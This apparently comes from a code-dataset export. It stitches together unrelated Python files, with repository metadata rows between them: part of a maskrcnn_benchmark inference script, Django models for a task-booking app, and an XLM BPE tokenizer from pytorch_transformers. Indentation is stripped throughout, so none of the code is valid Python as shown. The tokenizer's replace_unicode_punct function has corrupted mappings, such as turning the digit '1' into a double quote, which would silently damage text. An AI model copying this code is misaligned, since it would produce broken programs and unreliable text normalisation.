dataset_names = cfg.DATASETS.TEST
if cfg.OUTPUT_DIR:
for idx, dataset_name in enumerate(dataset_names):
output_folder = os.path.join(cfg.OUTPUT_DIR, "inference", dataset_name)
mkdir(output_folder)
output_folders[idx] = output_folder
data_loaders_val = make_data_loader(cfg, is_train=False, is_distributed=distributed)
for output_folder, dataset_name, data_loader_val in zip(output_folders, dataset_names, data_loaders_val):
inference(
model,
data_loader_val,
dataset_name=dataset_name,
iou_types=iou_types,
box_only=False if cfg.MODEL.RETINANET_ON else cfg.MODEL.RPN_ONLY,
device=cfg.MODEL.DEVICE,
expected_results=cfg.TEST.EXPECTED_RESULTS,
expected_results_sigma_tol=cfg.TEST.EXPECTED_RESULTS_SIGMA_TOL,
output_folder=output_folder,
)
synchronize()
if __name__ == "__main__":
main()
| 37.45045 | 114 | 0.718547 |
from maskrcnn_benchmark.utils.env import setup_environment
import argparse
import os
import torch
from maskrcnn_benchmark.config import cfg
from maskrcnn_benchmark.data import make_data_loader
from maskrcnn_benchmark.engine.inference import inference
from maskrcnn_benchmark.modeling.detector import build_detection_model
from maskrcnn_benchmark.utils.checkpoint import DetectronCheckpointer
from maskrcnn_benchmark.utils.collect_env import collect_env_info
from maskrcnn_benchmark.utils.comm import synchronize, get_rank
from maskrcnn_benchmark.utils.logger import setup_logger
from maskrcnn_benchmark.utils.miscellaneous import mkdir
def main():
parser = argparse.ArgumentParser(description="PyTorch Object Detection Inference")
parser.add_argument(
"--config-file",
default="/private/home/fmassa/github/detectron.pytorch_v2/configs/e2e_faster_rcnn_R_50_C4_1x_caffe2.yaml",
metavar="FILE",
help="path to config file",
)
parser.add_argument("--local_rank", type=int, default=0)
parser.add_argument(
"opts",
help="Modify config options using the command-line",
default=None,
nargs=argparse.REMAINDER,
)
args = parser.parse_args()
num_gpus = int(os.environ["WORLD_SIZE"]) if "WORLD_SIZE" in os.environ else 1
distributed = num_gpus > 1
if distributed:
torch.cuda.set_device(args.local_rank)
torch.distributed.init_process_group(
backend="nccl", init_method="env://"
)
synchronize()
cfg.merge_from_file(args.config_file)
cfg.merge_from_list(args.opts)
cfg.freeze()
save_dir = ""
logger = setup_logger("maskrcnn_benchmark", save_dir, get_rank())
logger.info("Using {} GPUs".format(num_gpus))
logger.info(cfg)
logger.info("Collecting env info (might take some time)")
logger.info("\n" + collect_env_info())
model = build_detection_model(cfg)
model.to(cfg.MODEL.DEVICE)
output_dir = cfg.OUTPUT_DIR
checkpointer = DetectronCheckpointer(cfg, model, save_dir=output_dir)
_ = checkpointer.load(cfg.MODEL.WEIGHT)
iou_types = ("bbox",)
if cfg.MODEL.MASK_ON:
iou_types = iou_types + ("segm",)
if cfg.MODEL.KEYPOINT_ON:
iou_types = iou_types + ("keypoints",)
output_folders = [None] * len(cfg.DATASETS.TEST)
dataset_names = cfg.DATASETS.TEST
if cfg.OUTPUT_DIR:
for idx, dataset_name in enumerate(dataset_names):
output_folder = os.path.join(cfg.OUTPUT_DIR, "inference", dataset_name)
mkdir(output_folder)
output_folders[idx] = output_folder
data_loaders_val = make_data_loader(cfg, is_train=False, is_distributed=distributed)
for output_folder, dataset_name, data_loader_val in zip(output_folders, dataset_names, data_loaders_val):
inference(
model,
data_loader_val,
dataset_name=dataset_name,
iou_types=iou_types,
box_only=False if cfg.MODEL.RETINANET_ON else cfg.MODEL.RPN_ONLY,
device=cfg.MODEL.DEVICE,
expected_results=cfg.TEST.EXPECTED_RESULTS,
expected_results_sigma_tol=cfg.TEST.EXPECTED_RESULTS_SIGMA_TOL,
output_folder=output_folder,
)
synchronize()
if __name__ == "__main__":
main()
| true | true |
f72312f03eb453b8f96cce81038cab6260ed892a | 3,125 | py | Python | backend/task/models.py | crowdbotics-apps/mediku-29462 | d8940002577bc39984ea5ed4367d0aaa68238ae0 | [
"FTL",
"AML",
"RSA-MD"
] | null | null | null | backend/task/models.py | crowdbotics-apps/mediku-29462 | d8940002577bc39984ea5ed4367d0aaa68238ae0 | [
"FTL",
"AML",
"RSA-MD"
] | 27 | 2021-08-08T20:40:05.000Z | 2021-10-06T01:54:51.000Z | backend/task/models.py | crowdbotics-apps/mediku-29462 | d8940002577bc39984ea5ed4367d0aaa68238ae0 | [
"FTL",
"AML",
"RSA-MD"
] | null | null | null | from django.conf import settings
from django.db import models
class TaskTransaction(models.Model):
"Generated Model"
status = models.CharField(
max_length=10,
)
timestamp_completed = models.DateTimeField(
null=True,
blank=True,
)
task = models.ForeignKey(
"task.Task",
null=True,
blank=True,
on_delete=models.CASCADE,
related_name="tasktransaction_task",
)
date = models.DateField(
null=True,
blank=True,
)
timestamp_started = models.DateTimeField(
null=True,
blank=True,
)
class Message(models.Model):
"Generated Model"
customer = models.ForeignKey(
"task_profile.CustomerProfile",
on_delete=models.CASCADE,
related_name="message_customer",
)
tasker = models.ForeignKey(
"task_profile.TaskerProfile",
on_delete=models.CASCADE,
related_name="message_tasker",
)
message = models.TextField()
timestamp_created = models.DateTimeField(
auto_now_add=True,
)
task = models.ForeignKey(
"task.Task",
null=True,
blank=True,
on_delete=models.SET_NULL,
related_name="message_task",
)
class Rating(models.Model):
"Generated Model"
tasker = models.ForeignKey(
"task_profile.TaskerProfile",
on_delete=models.CASCADE,
related_name="rating_tasker",
)
rating = models.FloatField()
timestamp_created = models.DateTimeField(
auto_now_add=True,
)
review = models.TextField(
null=True,
blank=True,
)
customer = models.ForeignKey(
"task_profile.CustomerProfile",
null=True,
blank=True,
on_delete=models.SET_NULL,
related_name="rating_customer",
)
class Task(models.Model):
"Generated Model"
customer = models.ForeignKey(
"task_profile.CustomerProfile",
on_delete=models.CASCADE,
related_name="task_customer",
)
tasker = models.ForeignKey(
"task_profile.TaskerProfile",
on_delete=models.CASCADE,
related_name="task_tasker",
)
category = models.ForeignKey(
"task_category.Category",
on_delete=models.CASCADE,
related_name="task_category",
)
details = models.TextField()
frequency = models.CharField(
max_length=7,
)
size = models.CharField(
max_length=6,
)
location = models.OneToOneField(
"location.TaskLocation",
on_delete=models.CASCADE,
related_name="task_location",
)
is_confirmed = models.BooleanField()
status = models.CharField(
max_length=10,
)
timestamp_created = models.DateTimeField(
auto_now_add=True,
)
timestamp_confirmed = models.DateTimeField(
null=True,
blank=True,
)
subcategory = models.ForeignKey(
"task_category.Subcategory",
null=True,
blank=True,
on_delete=models.CASCADE,
related_name="task_subcategory",
)
# Create your models here.
| 24.038462 | 47 | 0.61984 | from django.conf import settings
from django.db import models
class TaskTransaction(models.Model):
status = models.CharField(
max_length=10,
)
timestamp_completed = models.DateTimeField(
null=True,
blank=True,
)
task = models.ForeignKey(
"task.Task",
null=True,
blank=True,
on_delete=models.CASCADE,
related_name="tasktransaction_task",
)
date = models.DateField(
null=True,
blank=True,
)
timestamp_started = models.DateTimeField(
null=True,
blank=True,
)
class Message(models.Model):
customer = models.ForeignKey(
"task_profile.CustomerProfile",
on_delete=models.CASCADE,
related_name="message_customer",
)
tasker = models.ForeignKey(
"task_profile.TaskerProfile",
on_delete=models.CASCADE,
related_name="message_tasker",
)
message = models.TextField()
timestamp_created = models.DateTimeField(
auto_now_add=True,
)
task = models.ForeignKey(
"task.Task",
null=True,
blank=True,
on_delete=models.SET_NULL,
related_name="message_task",
)
class Rating(models.Model):
tasker = models.ForeignKey(
"task_profile.TaskerProfile",
on_delete=models.CASCADE,
related_name="rating_tasker",
)
rating = models.FloatField()
timestamp_created = models.DateTimeField(
auto_now_add=True,
)
review = models.TextField(
null=True,
blank=True,
)
customer = models.ForeignKey(
"task_profile.CustomerProfile",
null=True,
blank=True,
on_delete=models.SET_NULL,
related_name="rating_customer",
)
class Task(models.Model):
customer = models.ForeignKey(
"task_profile.CustomerProfile",
on_delete=models.CASCADE,
related_name="task_customer",
)
tasker = models.ForeignKey(
"task_profile.TaskerProfile",
on_delete=models.CASCADE,
related_name="task_tasker",
)
category = models.ForeignKey(
"task_category.Category",
on_delete=models.CASCADE,
related_name="task_category",
)
details = models.TextField()
frequency = models.CharField(
max_length=7,
)
size = models.CharField(
max_length=6,
)
location = models.OneToOneField(
"location.TaskLocation",
on_delete=models.CASCADE,
related_name="task_location",
)
is_confirmed = models.BooleanField()
status = models.CharField(
max_length=10,
)
timestamp_created = models.DateTimeField(
auto_now_add=True,
)
timestamp_confirmed = models.DateTimeField(
null=True,
blank=True,
)
subcategory = models.ForeignKey(
"task_category.Subcategory",
null=True,
blank=True,
on_delete=models.CASCADE,
related_name="task_subcategory",
)
| true | true |
f7231384b31af5980487157a907ab2c53e33945b | 35,093 | py | Python | pytorch_transformers/tokenization_xlm.py | clinia/K-Adapter | 7f46ae48d7941e519fb40ae62ac46e62115faaf5 | [
"MIT"
] | 98 | 2020-12-26T04:47:03.000Z | 2022-03-31T06:06:53.000Z | all_exp/kadapter/examples/pytorch_transformers/tokenization_xlm.py | yifan-h/GCS_KI | 5d5c68832aa37cefb1d01723c35fc3d74482c8c2 | [
"MIT"
] | 15 | 2020-11-30T09:57:09.000Z | 2022-03-30T13:56:43.000Z | all_exp/kadapter/examples/pytorch_transformers/tokenization_xlm.py | yifan-h/GCS_KI | 5d5c68832aa37cefb1d01723c35fc3d74482c8c2 | [
"MIT"
] | 23 | 2020-10-30T06:07:24.000Z | 2022-03-30T22:26:33.000Z | # coding=utf-8
# Copyright 2019 The Open AI Team Authors and The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tokenization classes for OpenAI GPT."""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import json
import logging
import os
import re
import sys
import unicodedata
from io import open
import sacremoses as sm
from .tokenization_utils import PreTrainedTokenizer
from .tokenization_bert import BasicTokenizer
logger = logging.getLogger(__name__)
VOCAB_FILES_NAMES = {
'vocab_file': 'vocab.json',
'merges_file': 'merges.txt',
}
PRETRAINED_VOCAB_FILES_MAP = {
'vocab_file':
{
'xlm-mlm-en-2048': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-en-2048-vocab.json",
'xlm-mlm-ende-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-ende-1024-vocab.json",
'xlm-mlm-enfr-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-enfr-1024-vocab.json",
'xlm-mlm-enro-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-enro-1024-vocab.json",
'xlm-mlm-tlm-xnli15-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-tlm-xnli15-1024-vocab.json",
'xlm-mlm-xnli15-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-xnli15-1024-vocab.json",
'xlm-clm-enfr-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-clm-enfr-1024-vocab.json",
'xlm-clm-ende-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-clm-ende-1024-vocab.json",
'xlm-mlm-17-1280': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-17-1280-vocab.json",
'xlm-mlm-100-1280': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-100-1280-vocab.json",
},
'merges_file':
{
'xlm-mlm-en-2048': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-en-2048-merges.txt",
'xlm-mlm-ende-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-ende-1024-merges.txt",
'xlm-mlm-enfr-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-enfr-1024-merges.txt",
'xlm-mlm-enro-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-enro-1024-merges.txt",
'xlm-mlm-tlm-xnli15-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-tlm-xnli15-1024-merges.txt",
'xlm-mlm-xnli15-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-xnli15-1024-merges.txt",
'xlm-clm-enfr-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-enfr-1024-merges.txt",
'xlm-clm-ende-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-ende-1024-merges.txt",
'xlm-mlm-17-1280': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-17-1280-merges.txt",
'xlm-mlm-100-1280': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-100-1280-merges.txt",
},
}
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {
'xlm-mlm-en-2048': 512,
'xlm-mlm-ende-1024': 512,
'xlm-mlm-enfr-1024': 512,
'xlm-mlm-enro-1024': 512,
'xlm-mlm-tlm-xnli15-1024': 512,
'xlm-mlm-xnli15-1024': 512,
'xlm-clm-enfr-1024': 512,
'xlm-clm-ende-1024': 512,
'xlm-mlm-17-1280': 512,
'xlm-mlm-100-1280': 512,
}
PRETRAINED_INIT_CONFIGURATION = {
'xlm-mlm-en-2048': {"do_lowercase_and_remove_accent": True},
'xlm-mlm-ende-1024': { "do_lowercase_and_remove_accent": True,
"id2lang": { "0": "de",
"1": "en"},
"lang2id": { "de": 0,
"en": 1 }},
'xlm-mlm-enfr-1024': { "do_lowercase_and_remove_accent": True,
"id2lang": { "0": "en",
"1": "fr"},
"lang2id": { "en": 0,
"fr": 1 }},
'xlm-mlm-enro-1024': { "do_lowercase_and_remove_accent": True,
"id2lang": { "0": "en",
"1": "ro"},
"lang2id": { "en": 0,
"ro": 1 }},
'xlm-mlm-tlm-xnli15-1024': { "do_lowercase_and_remove_accent": True,
"id2lang": { "0": "ar",
"1": "bg",
"2": "de",
"3": "el",
"4": "en",
"5": "es",
"6": "fr",
"7": "hi",
"8": "ru",
"9": "sw",
"10": "th",
"11": "tr",
"12": "ur",
"13": "vi",
"14": "zh"},
"lang2id": { "ar": 0,
"bg": 1,
"de": 2,
"el": 3,
"en": 4,
"es": 5,
"fr": 6,
"hi": 7,
"ru": 8,
"sw": 9,
"th": 10,
"tr": 11,
"ur": 12,
"vi": 13,
"zh": 14 }},
'xlm-mlm-xnli15-1024': { "do_lowercase_and_remove_accent": True,
"id2lang": { "0": "ar",
"1": "bg",
"2": "de",
"3": "el",
"4": "en",
"5": "es",
"6": "fr",
"7": "hi",
"8": "ru",
"9": "sw",
"10": "th",
"11": "tr",
"12": "ur",
"13": "vi",
"14": "zh"},
"lang2id": { "ar": 0,
"bg": 1,
"de": 2,
"el": 3,
"en": 4,
"es": 5,
"fr": 6,
"hi": 7,
"ru": 8,
"sw": 9,
"th": 10,
"tr": 11,
"ur": 12,
"vi": 13,
"zh": 14 }},
'xlm-clm-enfr-1024': { "do_lowercase_and_remove_accent": True,
"id2lang": { "0": "en",
"1": "fr"},
"lang2id": { "en": 0,
"fr": 1 }},
'xlm-clm-ende-1024': { "do_lowercase_and_remove_accent": True,
"id2lang": { "0": "de",
"1": "en"},
"lang2id": { "de": 0,
"en": 1 }},
'xlm-mlm-17-1280': {"do_lowercase_and_remove_accent": False,
"id2lang": {
"0": "ar",
"1": "de",
"2": "en",
"3": "es",
"4": "fr",
"5": "hi",
"6": "it",
"7": "ja",
"8": "ko",
"9": "nl",
"10": "pl",
"11": "pt",
"12": "ru",
"13": "sv",
"14": "tr",
"15": "vi",
"16": "zh"
},
"lang2id": {
"ar": 0,
"de": 1,
"en": 2,
"es": 3,
"fr": 4,
"hi": 5,
"it": 6,
"ja": 7,
"ko": 8,
"nl": 9,
"pl": 10,
"pt": 11,
"ru": 12,
"sv": 13,
"tr": 14,
"vi": 15,
"zh": 16}},
'xlm-mlm-100-1280': {"do_lowercase_and_remove_accent": False,
"id2lang": {
"0": "af",
"1": "als",
"2": "am",
"3": "an",
"4": "ang",
"5": "ar",
"6": "arz",
"7": "ast",
"8": "az",
"9": "bar",
"10": "be",
"11": "bg",
"12": "bn",
"13": "br",
"14": "bs",
"15": "ca",
"16": "ceb",
"17": "ckb",
"18": "cs",
"19": "cy",
"20": "da",
"21": "de",
"22": "el",
"23": "en",
"24": "eo",
"25": "es",
"26": "et",
"27": "eu",
"28": "fa",
"29": "fi",
"30": "fr",
"31": "fy",
"32": "ga",
"33": "gan",
"34": "gl",
"35": "gu",
"36": "he",
"37": "hi",
"38": "hr",
"39": "hu",
"40": "hy",
"41": "ia",
"42": "id",
"43": "is",
"44": "it",
"45": "ja",
"46": "jv",
"47": "ka",
"48": "kk",
"49": "kn",
"50": "ko",
"51": "ku",
"52": "la",
"53": "lb",
"54": "lt",
"55": "lv",
"56": "mk",
"57": "ml",
"58": "mn",
"59": "mr",
"60": "ms",
"61": "my",
"62": "nds",
"63": "ne",
"64": "nl",
"65": "nn",
"66": "no",
"67": "oc",
"68": "pl",
"69": "pt",
"70": "ro",
"71": "ru",
"72": "scn",
"73": "sco",
"74": "sh",
"75": "si",
"76": "simple",
"77": "sk",
"78": "sl",
"79": "sq",
"80": "sr",
"81": "sv",
"82": "sw",
"83": "ta",
"84": "te",
"85": "th",
"86": "tl",
"87": "tr",
"88": "tt",
"89": "uk",
"90": "ur",
"91": "uz",
"92": "vi",
"93": "war",
"94": "wuu",
"95": "yi",
"96": "zh",
"97": "zh_classical",
"98": "zh_min_nan",
"99": "zh_yue"
},
"lang2id": {
"af": 0,
"als": 1,
"am": 2,
"an": 3,
"ang": 4,
"ar": 5,
"arz": 6,
"ast": 7,
"az": 8,
"bar": 9,
"be": 10,
"bg": 11,
"bn": 12,
"br": 13,
"bs": 14,
"ca": 15,
"ceb": 16,
"ckb": 17,
"cs": 18,
"cy": 19,
"da": 20,
"de": 21,
"el": 22,
"en": 23,
"eo": 24,
"es": 25,
"et": 26,
"eu": 27,
"fa": 28,
"fi": 29,
"fr": 30,
"fy": 31,
"ga": 32,
"gan": 33,
"gl": 34,
"gu": 35,
"he": 36,
"hi": 37,
"hr": 38,
"hu": 39,
"hy": 40,
"ia": 41,
"id": 42,
"is": 43,
"it": 44,
"ja": 45,
"jv": 46,
"ka": 47,
"kk": 48,
"kn": 49,
"ko": 50,
"ku": 51,
"la": 52,
"lb": 53,
"lt": 54,
"lv": 55,
"mk": 56,
"ml": 57,
"mn": 58,
"mr": 59,
"ms": 60,
"my": 61,
"nds": 62,
"ne": 63,
"nl": 64,
"nn": 65,
"no": 66,
"oc": 67,
"pl": 68,
"pt": 69,
"ro": 70,
"ru": 71,
"scn": 72,
"sco": 73,
"sh": 74,
"si": 75,
"simple": 76,
"sk": 77,
"sl": 78,
"sq": 79,
"sr": 80,
"sv": 81,
"sw": 82,
"ta": 83,
"te": 84,
"th": 85,
"tl": 86,
"tr": 87,
"tt": 88,
"uk": 89,
"ur": 90,
"uz": 91,
"vi": 92,
"war": 93,
"wuu": 94,
"yi": 95,
"zh": 96,
"zh_classical": 97,
"zh_min_nan": 98,
"zh_yue": 99
}},
}
def get_pairs(word):
"""
Return set of symbol pairs in a word.
word is represented as tuple of symbols (symbols being variable-length strings)
"""
pairs = set()
prev_char = word[0]
for char in word[1:]:
pairs.add((prev_char, char))
prev_char = char
return pairs
def lowercase_and_remove_accent(text):
"""
Lowercase and strips accents from a piece of text based on
https://github.com/facebookresearch/XLM/blob/master/tools/lowercase_and_remove_accent.py
"""
text = ' '.join(text)
text = text.lower()
text = unicodedata.normalize("NFD", text)
output = []
for char in text:
cat = unicodedata.category(char)
if cat == "Mn":
continue
output.append(char)
return "".join(output).lower().split(' ')
def replace_unicode_punct(text):
'''
Port of https://github.com/moses-smt/mosesdecoder/blob/master/scripts/tokenizer/replace-unicode-punctuation.perl
'''
text = text.replace(',', ',')
text = re.sub(r'。\s*', '. ', text)
text = text.replace('、', ',')
text = text.replace('”', '"')
text = text.replace('“', '"')
text = text.replace('∶', ':')
text = text.replace(':', ':')
text = text.replace('?', '?')
text = text.replace('《', '"')
text = text.replace('》', '"')
text = text.replace(')', ')')
text = text.replace('!', '!')
text = text.replace('(', '(')
text = text.replace(';', ';')
text = text.replace('1', '"')
text = text.replace('」', '"')
text = text.replace('「', '"')
text = text.replace('0', '0')
text = text.replace('3', '3')
text = text.replace('2', '2')
text = text.replace('5', '5')
text = text.replace('6', '6')
text = text.replace('9', '9')
text = text.replace('7', '7')
text = text.replace('8', '8')
text = text.replace('4', '4')
text = re.sub(r'.\s*', '. ', text)
text = text.replace('~', '~')
text = text.replace('’', '\'')
text = text.replace('…', '...')
text = text.replace('━', '-')
text = text.replace('〈', '<')
text = text.replace('〉', '>')
text = text.replace('【', '[')
text = text.replace('】', ']')
text = text.replace('%', '%')
return text
def remove_non_printing_char(text):
'''
Port of https://github.com/moses-smt/mosesdecoder/blob/master/scripts/tokenizer/remove-non-printing-char.perl
'''
output = []
for char in text:
cat = unicodedata.category(char)
if cat.startswith('C'):
continue
output.append(char)
return "".join(output)
def romanian_preprocessing(text):
'''Sennrich's WMT16 scripts for Romanian preprocessing, used by model `xlm-mlm-enro-1024`'''
# https://github.com/rsennrich/wmt16-scripts/blob/master/preprocess/normalise-romanian.py
text = text.replace("\u015e", "\u0218").replace("\u015f", "\u0219")
text = text.replace("\u0162", "\u021a").replace("\u0163", "\u021b")
# https://github.com/rsennrich/wmt16-scripts/blob/master/preprocess/remove-diacritics.py
text = text.replace("\u0218", "S").replace("\u0219", "s") #s-comma
text = text.replace("\u021a", "T").replace("\u021b", "t") #t-comma
text = text.replace("\u0102", "A").replace("\u0103", "a")
text = text.replace("\u00C2", "A").replace("\u00E2", "a")
text = text.replace("\u00CE", "I").replace("\u00EE", "i")
return text
class XLMTokenizer(PreTrainedTokenizer):
"""
BPE tokenizer for XLM
- Moses preprocessing & tokenization for most supported languages
- Language specific tokenization for Chinese (Jieba), Japanese (KyTea) and Thai (PyThaiNLP)
- (optionally) lower case & normalize all inputs text
- argument ``special_tokens`` and function ``set_special_tokens``, can be used to add additional symbols \
(ex: "__classify__") to a vocabulary
- `lang2id` attribute maps the languages supported by the model with their ids if provided (automatically set for pretrained vocabularies)
- `id2lang` attributes does reverse mapping if provided (automatically set for pretrained vocabularies)
- `do_lowercase_and_remove_accent` controle lower casing and accent (automatically set for pretrained vocabularies)
"""
vocab_files_names = VOCAB_FILES_NAMES
pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
pretrained_init_configuration = PRETRAINED_INIT_CONFIGURATION
max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
def __init__(self, vocab_file, merges_file, unk_token="<unk>", bos_token="<s>",
sep_token="</s>", pad_token="<pad>", cls_token="</s>",
mask_token="<special1>", additional_special_tokens=["<special0>",
"<special1>", "<special2>", "<special3>", "<special4>", "<special5>",
"<special6>", "<special7>", "<special8>", "<special9>"],
lang2id=None, id2lang=None, do_lowercase_and_remove_accent=True,
**kwargs):
super(XLMTokenizer, self).__init__(unk_token=unk_token, bos_token=bos_token,
sep_token=sep_token, pad_token=pad_token,
cls_token=cls_token, mask_token=mask_token,
additional_special_tokens=additional_special_tokens,
**kwargs)
# cache of sm.MosesPunctNormalizer instance
self.cache_moses_punct_normalizer = dict()
# cache of sm.MosesTokenizer instance
self.cache_moses_tokenizer = dict()
self.lang_with_custom_tokenizer = set(['zh', 'th', 'ja'])
# True for current supported model (v1.2.0), False for XLM-17 & 100
self.do_lowercase_and_remove_accent = do_lowercase_and_remove_accent
self.lang2id = lang2id
self.id2lang = id2lang
if lang2id is not None and id2lang is not None:
assert len(lang2id) == len(id2lang)
self.ja_word_tokenizer = None
self.zh_word_tokenizer = None
self.encoder = json.load(open(vocab_file, encoding="utf-8"))
self.decoder = {v:k for k,v in self.encoder.items()}
merges = open(merges_file, encoding='utf-8').read().split('\n')[:-1]
merges = [tuple(merge.split()[:2]) for merge in merges]
self.bpe_ranks = dict(zip(merges, range(len(merges))))
self.cache = {}
def moses_punct_norm(self, text, lang):
if lang not in self.cache_moses_punct_normalizer:
punct_normalizer = sm.MosesPunctNormalizer(lang=lang)
self.cache_moses_punct_normalizer[lang] = punct_normalizer
else:
punct_normalizer = self.cache_moses_punct_normalizer[lang]
return punct_normalizer.normalize(text)
def moses_tokenize(self, text, lang):
if lang not in self.cache_moses_tokenizer:
moses_tokenizer = sm.MosesTokenizer(lang=lang)
self.cache_moses_tokenizer[lang] = moses_tokenizer
else:
moses_tokenizer = self.cache_moses_tokenizer[lang]
return moses_tokenizer.tokenize(text, return_str=False, escape=False)
def moses_pipeline(self, text, lang):
text = replace_unicode_punct(text)
text = self.moses_punct_norm(text, lang)
text = remove_non_printing_char(text)
return text
def ja_tokenize(self, text):
if self.ja_word_tokenizer is None:
try:
import Mykytea
self.ja_word_tokenizer = Mykytea.Mykytea('-model %s/local/share/kytea/model.bin' % os.path.expanduser('~'))
except (AttributeError, ImportError) as e:
logger.error("Make sure you install KyTea (https://github.com/neubig/kytea) and it's python wrapper (https://github.com/chezou/Mykytea-python) with the following steps")
logger.error("1. git clone git@github.com:neubig/kytea.git && cd kytea")
logger.error("2. autoreconf -i")
logger.error("3. ./configure --prefix=$HOME/local")
logger.error("4. make && make install")
logger.error("5. pip install kytea")
raise e
return list(self.ja_word_tokenizer.getWS(text))
@property
def vocab_size(self):
return len(self.encoder)
def bpe(self, token):
word = tuple(token[:-1]) + (token[-1] + '</w>',)
if token in self.cache:
return self.cache[token]
pairs = get_pairs(word)
if not pairs:
return token+'</w>'
while True:
bigram = min(pairs, key=lambda pair: self.bpe_ranks.get(pair, float('inf')))
if bigram not in self.bpe_ranks:
break
first, second = bigram
new_word = []
i = 0
while i < len(word):
try:
j = word.index(first, i)
new_word.extend(word[i:j])
i = j
except:
new_word.extend(word[i:])
break
if word[i] == first and i < len(word)-1 and word[i+1] == second:
new_word.append(first+second)
i += 2
else:
new_word.append(word[i])
i += 1
new_word = tuple(new_word)
word = new_word
if len(word) == 1:
break
else:
pairs = get_pairs(word)
word = ' '.join(word)
if word == '\n </w>':
word = '\n</w>'
self.cache[token] = word
return word
def _tokenize(self, text, lang='en', bypass_tokenizer=False):
"""
Tokenize a string given language code. For Chinese, Japanese and Thai, we use a language specific tokenizerself. Otherwise, we use Moses.
Details of tokenization:
- [sacremoses](https://github.com/alvations/sacremoses): port of Moses
- Install with `pip install sacremoses`
- [pythainlp](https://github.com/PyThaiNLP/pythainlp): Thai tokenizer
- Install with `pip install pythainlp`
- [kytea](https://github.com/chezou/Mykytea-python): Japanese tokenizer, wrapper of [KyTea](https://github.com/neubig/kytea)
- Install with the following steps:
```
git clone git@github.com:neubig/kytea.git && cd kytea
autoreconf -i
./configure --prefix=$HOME/local
make && make install
pip install kytea
```
- [jieba](https://github.com/fxsjy/jieba): Chinese tokenizer *
- Install with `pip install jieba`
\* The original XLM used [Stanford Segmenter](https://nlp.stanford.edu/software/stanford-segmenter-2018-10-16.zip).
However, the wrapper (`nltk.tokenize.stanford_segmenter`) is slow due to JVM overhead, and it will be deprecated.
Jieba is a lot faster and pip-installable. Note there is some mismatch with the Stanford Segmenter. It should be fine
if you fine-tune the model with Chinese supervisionself. If you want the same exact behaviour, use the original XLM
[preprocessing script](https://github.com/facebookresearch/XLM/tree/master/tools) to tokenize the sentence externally,
and set `bypass_tokenizer=True` to bypass the tokenizer.
Args:
- lang: ISO language code (default = 'en') (string). Languages should belong of the model supported languages. However, we don't enforce it.
- bypass_tokenizer: Allow users to preprocess and tokenize the sentences externally (default = False) (bool). If True, we only apply BPE.
Returns:
List of tokens.
"""
if lang and self.lang2id and lang not in self.lang2id:
logger.error("Supplied language code not found in lang2id mapping. Please check that your language is supported by the loaded pretrained model.")
if bypass_tokenizer:
text = text.split()
elif lang not in self.lang_with_custom_tokenizer:
text = self.moses_pipeline(text, lang=lang)
# TODO: make sure we are using `xlm-mlm-enro-1024`, since XLM-100 doesn't have this step
if lang == 'ro':
text = romanian_preprocessing(text)
text = self.moses_tokenize(text, lang=lang)
elif lang == 'th':
text = self.moses_pipeline(text, lang=lang)
try:
if 'pythainlp' not in sys.modules:
from pythainlp.tokenize import word_tokenize as th_word_tokenize
else:
th_word_tokenize = sys.modules['pythainlp'].word_tokenize
except (AttributeError, ImportError) as e:
logger.error("Make sure you install PyThaiNLP (https://github.com/PyThaiNLP/pythainlp) with the following steps")
logger.error("1. pip install pythainlp")
raise e
text = th_word_tokenize(text)
elif lang == 'zh':
try:
if 'jieba' not in sys.modules:
import jieba
else:
jieba = sys.modules['jieba']
except (AttributeError, ImportError) as e:
logger.error("Make sure you install Jieba (https://github.com/fxsjy/jieba) with the following steps")
logger.error("1. pip install jieba")
raise e
text = ' '.join(jieba.cut(text))
text = self.moses_pipeline(text, lang=lang)
text = text.split()
elif lang == 'ja':
text = self.moses_pipeline(text, lang=lang)
text = self.ja_tokenize(text)
else:
raise ValueError('It should not reach here')
if self.do_lowercase_and_remove_accent and not bypass_tokenizer:
text = lowercase_and_remove_accent(text)
split_tokens = []
for token in text:
if token:
split_tokens.extend([t for t in self.bpe(token).split(' ')])
return split_tokens
def _convert_token_to_id(self, token):
""" Converts a token (str/unicode) in an id using the vocab. """
return self.encoder.get(token, self.encoder.get(self.unk_token))
def _convert_id_to_token(self, index):
"""Converts an index (integer) in a token (string/unicode) using the vocab."""
return self.decoder.get(index, self.unk_token)
def convert_tokens_to_string(self, tokens):
""" Converts a sequence of tokens (string) in a single string. """
out_string = ''.join(tokens).replace('</w>', ' ').strip()
return out_string
def add_special_tokens_single_sentence(self, token_ids):
"""
Adds special tokens to a sequence for sequence classification tasks.
An XLM sequence has the following format: [CLS] X [SEP]
"""
